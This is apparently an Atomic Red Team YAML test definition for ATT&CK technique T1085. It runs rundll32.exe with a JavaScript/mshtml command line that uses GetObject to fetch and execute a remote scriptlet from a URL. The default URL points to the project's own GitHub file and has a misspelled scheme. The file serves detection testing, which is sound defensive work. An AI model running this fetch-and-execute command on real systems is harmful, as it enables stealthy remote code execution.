Files
atomic-red-team/atomics/T1085/T1085.yaml
T
2018-05-23 17:09:04 -06:00

18 lines
604 B
YAML

attack_technique: T1085
display_name: Rundll32
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: |
Test execution of a remote script using rundll32.exe
supported_platforms:
- windows
input_arguments:
file_url:
description: location of the payload
type: Url
default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
executor:
name: command_prompt
command: |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"